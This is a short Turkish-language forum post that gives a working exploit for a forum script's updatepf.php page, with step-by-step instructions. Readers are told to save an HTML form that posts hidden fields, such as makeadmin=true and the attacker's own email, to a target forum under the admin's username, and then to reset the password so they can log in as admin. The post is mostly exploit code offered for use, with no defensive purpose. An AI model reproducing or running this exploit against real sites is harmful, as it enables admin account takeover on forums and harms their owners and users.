Test adresini görmek için burdan buyrun.
Exploiti çalıştırmak için bir txt dosyası açın aşağıdaki kodları kopyalayın <INPUT type=hidden name=email value="a@b.c"> buraya kendi mailinizi yazın dosyayı html olarak kaydedin kaydettiğiniz dosyayı açın gelen kutucuğa forumun adresini yazın ve daha sonra admin ismini yazın ve enterlayın.
Giriş için şifrenizi bilmeniz gerek bunun içinde şifremi unuttum deyin ve şifreniz mailinize gelsin
Kod:
Kod:
<FORM method=post enctype="multipart/form-data">
Existing User:<INPUT name=uname><br>
<INPUT type=file name=userfile style="visibility:HIDDEN"><br>
<INPUT type=hidden name=email value="a@b.c">
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit>
</FORM>
<script language="JavaScript">
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/"+"updatepf.php";
</script>